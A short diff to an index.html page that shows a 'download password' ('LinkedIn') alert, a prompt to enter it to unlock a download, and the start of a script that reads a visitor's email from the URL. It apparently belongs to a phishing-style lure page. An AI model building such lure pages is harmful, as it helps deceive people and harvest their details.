--- a/index.html
+++ b/index.html
@@ -1,8 +1,7 @@
 <script language="javascript">alert(' The download password is: LinkedIn');  </script>
 
-<br><br><br><br><br><br><br><br><br><br><br><h2>Unlock your download by entering the password, then click on the "Download File" button to get instant access to your content!</h2>
-<p>Enter the Downliad Password as:<b>Linkedin
-<br><br><br><br><br><pbr><br><center><br><b>The download password is: LinkedIn</b>
+<h2>Unlock your download by entering the password:<b> Linkedin , then click on the "Download File" button to get instant access to your content!</h2>
+<p>Enter the Download Password as:<b>Linkedin
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
